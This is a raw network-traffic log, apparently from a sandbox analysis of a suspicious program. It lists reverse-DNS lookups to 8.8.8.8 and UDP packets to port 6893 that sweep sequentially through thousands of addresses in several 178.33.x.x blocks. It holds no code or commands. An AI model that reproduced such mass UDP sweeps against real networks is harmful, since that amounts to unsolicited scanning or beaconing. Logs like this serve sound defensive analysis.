US 8.8.8.8:53 226.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 227.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 228.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 230.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 229.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 231.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 232.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 233.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 234.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 235.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 236.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 237.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 238.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 239.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 240.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 241.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 243.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 242.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 244.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 245.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 246.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 247.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 248.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 249.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 250.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 251.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 252.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 253.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 254.162.33.178.in-addr.arpa udp
FR 178.33.162.255:6893 udp
FR 178.33.163.0:6893 udp
FR 178.33.163.1:6893 udp
FR 178.33.163.2:6893 udp
FR 178.33.163.3:6893 udp
FR 178.33.163.4:6893 udp
FR 178.33.163.5:6893 udp
FR 178.33.163.6:6893 udp
FR 178.33.163.7:6893 udp
FR 178.33.163.8:6893 udp
FR 178.33.163.9:6893 udp
FR 178.33.163.10:6893 udp
FR 178.33.163.11:6893 udp
FR 178.33.163.12:6893 udp
FR 178.33.163.13:6893 udp
FR 178.33.163.14:6893 udp
FR 178.33.163.15:6893 udp
FR 178.33.163.16:6893 udp
FR 178.33.163.17:6893 udp
FR 178.33.163.18:6893 udp
FR 178.33.163.19:6893 udp
FR 178.33.163.20:6893 udp
FR 178.33.163.21:6893 udp
FR 178.33.163.22:6893 udp
FR 178.33.163.23:6893 udp
FR 178.33.163.24:6893 udp
FR 178.33.163.25:6893 udp
FR 178.33.163.26:6893 udp
FR 178.33.163.27:6893 udp
FR 178.33.163.28:6893 udp
FR 178.33.163.29:6893 udp
FR 178.33.163.30:6893 udp
FR 178.33.163.31:6893 udp
FR 178.33.163.32:6893 udp
FR 178.33.163.33:6893 udp
FR 178.33.163.34:6893 udp
FR 178.33.163.35:6893 udp
FR 178.33.163.36:6893 udp
FR 178.33.163.37:6893 udp
FR 178.33.163.38:6893 udp
FR 178.33.163.39:6893 udp
FR 178.33.163.40:6893 udp
FR 178.33.163.41:6893 udp
FR 178.33.163.42:6893 udp
FR 178.33.163.43:6893 udp
FR 178.33.163.44:6893 udp
FR 178.33.163.45:6893 udp
FR 178.33.163.46:6893 udp
FR 178.33.163.47:6893 udp
FR 178.33.163.48:6893 udp
FR 178.33.163.49:6893 udp
FR 178.33.163.50:6893 udp
FR 178.33.163.51:6893 udp
FR 178.33.163.52:6893 udp
FR 178.33.163.53:6893 udp
FR 178.33.163.54:6893 udp
FR 178.33.163.55:6893 udp
FR 178.33.163.56:6893 udp
FR 178.33.163.57:6893 udp
FR 178.33.163.58:6893 udp
FR 178.33.163.59:6893 udp
FR 178.33.163.60:6893 udp
FR 178.33.163.61:6893 udp
FR 178.33.163.62:6893 udp
FR 178.33.163.63:6893 udp
FR 178.33.163.64:6893 udp
FR 178.33.163.65:6893 udp
FR 178.33.163.66:6893 udp
FR 178.33.163.67:6893 udp
FR 178.33.163.68:6893 udp
FR 178.33.163.69:6893 udp
FR 178.33.163.70:6893 udp
FR 178.33.163.71:6893 udp
FR 178.33.163.72:6893 udp
FR 178.33.163.73:6893 udp
FR 178.33.163.74:6893 udp
FR 178.33.163.75:6893 udp
FR 178.33.163.76:6893 udp
FR 178.33.163.77:6893 udp
FR 178.33.163.78:6893 udp
FR 178.33.163.79:6893 udp
FR 178.33.163.80:6893 udp
FR 178.33.163.81:6893 udp
FR 178.33.163.82:6893 udp
FR 178.33.163.83:6893 udp
FR 178.33.163.84:6893 udp
FR 178.33.163.85:6893 udp
FR 178.33.163.86:6893 udp
FR 178.33.163.87:6893 udp
FR 178.33.163.88:6893 udp
FR 178.33.163.89:6893 udp
FR 178.33.163.90:6893 udp
FR 178.33.163.91:6893 udp
FR 178.33.163.92:6893 udp
FR 178.33.163.93:6893 udp
FR 178.33.163.94:6893 udp
FR 178.33.163.95:6893 udp
FR 178.33.163.96:6893 udp
FR 178.33.163.97:6893 udp
FR 178.33.163.98:6893 udp
FR 178.33.163.99:6893 udp
FR 178.33.163.100:6893 udp
FR 178.33.163.101:6893 udp
FR 178.33.163.102:6893 udp
FR 178.33.163.103:6893 udp
FR 178.33.163.104:6893 udp
FR 178.33.163.105:6893 udp
FR 178.33.163.106:6893 udp
FR 178.33.163.107:6893 udp
FR 178.33.163.108:6893 udp
FR 178.33.163.109:6893 udp
FR 178.33.163.110:6893 udp
FR 178.33.163.111:6893 udp
FR 178.33.163.112:6893 udp
FR 178.33.163.113:6893 udp
FR 178.33.163.114:6893 udp
FR 178.33.163.115:6893 udp
FR 178.33.163.116:6893 udp
FR 178.33.163.117:6893 udp
FR 178.33.163.118:6893 udp
FR 178.33.163.119:6893 udp
FR 178.33.163.120:6893 udp
FR 178.33.163.121:6893 udp
FR 178.33.163.122:6893 udp
FR 178.33.163.123:6893 udp
FR 178.33.163.124:6893 udp
FR 178.33.163.125:6893 udp
FR 178.33.163.126:6893 udp
FR 178.33.163.127:6893 udp
FR 178.33.163.128:6893 udp
FR 178.33.163.129:6893 udp
FR 178.33.163.130:6893 udp
FR 178.33.163.131:6893 udp
FR 178.33.163.132:6893 udp
FR 178.33.163.133:6893 udp
FR 178.33.163.134:6893 udp
FR 178.33.163.135:6893 udp
FR 178.33.163.136:6893 udp
FR 178.33.163.137:6893 udp
FR 178.33.163.138:6893 udp
FR 178.33.163.139:6893 udp
FR 178.33.163.140:6893 udp
FR 178.33.163.141:6893 udp
FR 178.33.163.142:6893 udp
FR 178.33.163.143:6893 udp
FR 178.33.163.144:6893 udp
FR 178.33.163.145:6893 udp
FR 178.33.163.146:6893 udp
FR 178.33.163.147:6893 udp
FR 178.33.163.148:6893 udp
FR 178.33.163.149:6893 udp
FR 178.33.163.150:6893 udp
FR 178.33.163.151:6893 udp
FR 178.33.163.152:6893 udp
FR 178.33.163.153:6893 udp
FR 178.33.163.154:6893 udp
FR 178.33.163.155:6893 udp
FR 178.33.163.156:6893 udp
FR 178.33.163.157:6893 udp
FR 178.33.163.158:6893 udp
FR 178.33.163.159:6893 udp
FR 178.33.163.160:6893 udp
FR 178.33.163.161:6893 udp
FR 178.33.163.162:6893 udp
FR 178.33.163.163:6893 udp
FR 178.33.163.164:6893 udp
FR 178.33.163.165:6893 udp
FR 178.33.163.166:6893 udp
FR 178.33.163.167:6893 udp
FR 178.33.163.168:6893 udp
FR 178.33.163.169:6893 udp
FR 178.33.163.170:6893 udp
FR 178.33.163.171:6893 udp
FR 178.33.163.172:6893 udp
FR 178.33.163.173:6893 udp
FR 178.33.163.174:6893 udp
FR 178.33.163.175:6893 udp
FR 178.33.163.176:6893 udp
FR 178.33.163.177:6893 udp
FR 178.33.163.178:6893 udp
FR 178.33.163.179:6893 udp
FR 178.33.163.180:6893 udp
FR 178.33.163.181:6893 udp
FR 178.33.163.182:6893 udp
FR 178.33.163.183:6893 udp
FR 178.33.163.184:6893 udp
FR 178.33.163.185:6893 udp
FR 178.33.163.186:6893 udp
FR 178.33.163.187:6893 udp
FR 178.33.163.188:6893 udp
FR 178.33.163.189:6893 udp
FR 178.33.163.190:6893 udp
FR 178.33.163.191:6893 udp
FR 178.33.163.192:6893 udp
FR 178.33.163.193:6893 udp
FR 178.33.163.194:6893 udp
FR 178.33.163.195:6893 udp
FR 178.33.163.196:6893 udp
FR 178.33.163.197:6893 udp
FR 178.33.163.198:6893 udp
FR 178.33.163.199:6893 udp
FR 178.33.163.200:6893 udp
FR 178.33.163.201:6893 udp
FR 178.33.163.202:6893 udp
FR 178.33.163.203:6893 udp
FR 178.33.163.204:6893 udp
FR 178.33.163.205:6893 udp
FR 178.33.163.206:6893 udp
FR 178.33.163.207:6893 udp
FR 178.33.163.208:6893 udp
FR 178.33.163.209:6893 udp
FR 178.33.163.210:6893 udp
FR 178.33.163.211:6893 udp
FR 178.33.163.212:6893 udp
FR 178.33.163.213:6893 udp
FR 178.33.163.214:6893 udp
FR 178.33.163.215:6893 udp
FR 178.33.163.216:6893 udp
FR 178.33.163.217:6893 udp
FR 178.33.163.218:6893 udp
FR 178.33.163.219:6893 udp
FR 178.33.163.220:6893 udp
FR 178.33.163.221:6893 udp
FR 178.33.163.222:6893 udp
FR 178.33.163.223:6893 udp
FR 178.33.163.224:6893 udp
FR 178.33.163.225:6893 udp
FR 178.33.163.226:6893 udp
FR 178.33.163.227:6893 udp
FR 178.33.163.228:6893 udp
FR 178.33.163.229:6893 udp
FR 178.33.163.230:6893 udp
FR 178.33.163.231:6893 udp
FR 178.33.163.232:6893 udp
FR 178.33.163.233:6893 udp
FR 178.33.163.234:6893 udp
FR 178.33.163.235:6893 udp
FR 178.33.163.236:6893 udp
FR 178.33.163.237:6893 udp
FR 178.33.163.238:6893 udp
FR 178.33.163.239:6893 udp
FR 178.33.163.240:6893 udp
FR 178.33.163.241:6893 udp
FR 178.33.163.242:6893 udp
FR 178.33.163.243:6893 udp
FR 178.33.163.244:6893 udp
FR 178.33.163.245:6893 udp
FR 178.33.163.246:6893 udp
FR 178.33.163.247:6893 udp
FR 178.33.163.248:6893 udp
FR 178.33.163.249:6893 udp
FR 178.33.163.250:6893 udp
FR 178.33.163.251:6893 udp
FR 178.33.163.252:6893 udp
FR 178.33.163.253:6893 udp
FR 178.33.163.254:6893 udp
US 8.8.8.8:53 255.162.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 33.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 32.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 35.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 36.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 34.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 37.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 38.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 39.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 40.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 41.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 42.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 43.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 44.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 46.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 45.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 48.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 47.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 49.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 50.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 51.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 52.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 53.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 54.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 55.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 56.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 57.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 58.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 59.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 60.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 61.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 63.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 62.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 64.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 65.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 66.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 67.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 68.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 69.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 70.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 71.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 72.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 73.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 74.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 75.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 76.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 77.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 78.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 79.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 80.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 82.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 83.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 84.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 85.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 86.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 87.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 88.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 89.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 90.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 91.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 92.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 93.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 95.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 94.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 96.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 97.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 98.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 99.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 100.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 101.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 102.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 103.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 104.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 105.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 107.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 106.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 108.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 109.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 110.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 112.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 111.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 113.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 114.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 115.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 116.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 117.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 118.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 119.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 120.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 121.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 122.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 123.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 125.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 124.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 126.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 127.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 128.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 129.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 130.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 132.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 131.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 134.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 136.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 137.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 138.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 139.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 140.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 142.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 143.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 144.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 146.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 147.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 148.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 149.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 150.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 154.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 153.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 155.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 157.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 156.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 158.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 159.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 160.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 161.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 162.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 163.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 164.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 165.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 166.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 167.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 168.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 169.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 171.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 170.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 172.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 174.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 175.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 176.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 177.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 178.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 180.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 179.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 181.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 183.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 184.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 185.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 186.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 187.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 188.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 189.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 190.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 191.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 192.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 193.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 194.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 195.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 196.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 197.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 198.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 199.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 200.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 201.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 202.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 203.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 204.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 205.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 206.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 207.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 208.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 209.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 210.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 211.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 213.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 214.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 215.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 216.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 217.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 218.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 219.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 220.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 222.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 221.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 223.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 224.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 225.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 226.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 227.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 228.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 230.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 229.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 231.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 232.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 233.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 234.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 235.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 237.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 236.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 238.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 240.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 241.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 242.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 243.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 244.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 245.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 246.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 247.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 248.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 249.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 250.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 251.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 252.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 253.163.33.178.in-addr.arpa udp
US 8.8.8.8:53 254.163.33.178.in-addr.arpa udp
FR 178.33.163.255:6893 udp
US 8.8.8.8:53 255.163.33.178.in-addr.arpa udp
FR 178.33.158.0:6893 udp
FR 178.33.158.1:6893 udp
FR 178.33.158.2:6893 udp
FR 178.33.158.3:6893 udp
FR 178.33.158.4:6893 udp
FR 178.33.158.5:6893 udp
FR 178.33.158.6:6893 udp
FR 178.33.158.7:6893 udp
FR 178.33.158.8:6893 udp
FR 178.33.158.9:6893 udp
FR 178.33.158.10:6893 udp
FR 178.33.158.11:6893 udp
FR 178.33.158.12:6893 udp
FR 178.33.158.13:6893 udp
FR 178.33.158.14:6893 udp
FR 178.33.158.15:6893 udp
FR 178.33.158.16:6893 udp
FR 178.33.158.17:6893 udp
FR 178.33.158.18:6893 udp
FR 178.33.158.19:6893 udp
FR 178.33.158.20:6893 udp
FR 178.33.158.21:6893 udp
FR 178.33.158.22:6893 udp
FR 178.33.158.23:6893 udp
FR 178.33.158.24:6893 udp
FR 178.33.158.25:6893 udp
FR 178.33.158.26:6893 udp
FR 178.33.158.27:6893 udp
FR 178.33.158.28:6893 udp
FR 178.33.158.29:6893 udp
FR 178.33.158.30:6893 udp
FR 178.33.158.31:6893 udp
FR 178.33.159.0:6893 udp
FR 178.33.159.1:6893 udp
FR 178.33.159.2:6893 udp
FR 178.33.159.3:6893 udp
FR 178.33.159.4:6893 udp
FR 178.33.159.5:6893 udp
FR 178.33.159.6:6893 udp
FR 178.33.159.7:6893 udp
FR 178.33.159.8:6893 udp
FR 178.33.159.9:6893 udp
FR 178.33.159.10:6893 udp
FR 178.33.159.11:6893 udp
FR 178.33.159.12:6893 udp
FR 178.33.159.13:6893 udp
FR 178.33.159.14:6893 udp
FR 178.33.159.15:6893 udp
FR 178.33.159.16:6893 udp
FR 178.33.159.17:6893 udp
FR 178.33.159.18:6893 udp
FR 178.33.159.19:6893 udp
FR 178.33.159.20:6893 udp
FR 178.33.159.21:6893 udp
FR 178.33.159.22:6893 udp
FR 178.33.159.23:6893 udp
FR 178.33.159.24:6893 udp
FR 178.33.159.25:6893 udp
FR 178.33.159.26:6893 udp
FR 178.33.159.27:6893 udp
FR 178.33.159.28:6893 udp
FR 178.33.159.29:6893 udp
FR 178.33.159.30:6893 udp
FR 178.33.159.31:6893 udp
FR 178.33.160.0:6893 udp
FR 178.33.160.1:6893 udp
FR 178.33.160.2:6893 udp
FR 178.33.160.3:6893 udp
FR 178.33.160.4:6893 udp
FR 178.33.160.5:6893 udp
FR 178.33.160.6:6893 udp
FR 178.33.160.7:6893 udp
FR 178.33.160.8:6893 udp
FR 178.33.160.9:6893 udp
FR 178.33.160.10:6893 udp
FR 178.33.160.11:6893 udp
FR 178.33.160.12:6893 udp
FR 178.33.160.13:6893 udp
FR 178.33.160.14:6893 udp
FR 178.33.160.15:6893 udp
FR 178.33.160.16:6893 udp
FR 178.33.160.17:6893 udp
FR 178.33.160.18:6893 udp
FR 178.33.160.19:6893 udp
FR 178.33.160.20:6893 udp
FR 178.33.160.21:6893 udp
FR 178.33.160.22:6893 udp
FR 178.33.160.23:6893 udp
FR 178.33.160.24:6893 udp
FR 178.33.160.25:6893 udp
FR 178.33.160.26:6893 udp
FR 178.33.160.27:6893 udp
FR 178.33.160.28:6893 udp
FR 178.33.160.29:6893 udp
FR 178.33.160.30:6893 udp
FR 178.33.160.31:6893 udp
FR 178.33.160.32:6893 udp
FR 178.33.160.33:6893 udp
FR 178.33.160.34:6893 udp
FR 178.33.160.35:6893 udp
FR 178.33.160.36:6893 udp
FR 178.33.160.37:6893 udp
FR 178.33.160.38:6893 udp
FR 178.33.160.39:6893 udp
FR 178.33.160.40:6893 udp
FR 178.33.160.41:6893 udp
FR 178.33.160.42:6893 udp
FR 178.33.160.43:6893 udp
FR 178.33.160.44:6893 udp
FR 178.33.160.45:6893 udp
FR 178.33.160.46:6893 udp
FR 178.33.160.47:6893 udp
FR 178.33.160.48:6893 udp
FR 178.33.160.49:6893 udp
FR 178.33.160.50:6893 udp
FR 178.33.160.51:6893 udp
FR 178.33.160.52:6893 udp
FR 178.33.160.53:6893 udp
FR 178.33.160.54:6893 udp
FR 178.33.160.55:6893 udp
FR 178.33.160.56:6893 udp
FR 178.33.160.57:6893 udp
FR 178.33.160.58:6893 udp
FR 178.33.160.59:6893 udp
FR 178.33.160.60:6893 udp
FR 178.33.160.61:6893 udp
FR 178.33.160.62:6893 udp
FR 178.33.160.63:6893 udp
FR 178.33.160.64:6893 udp
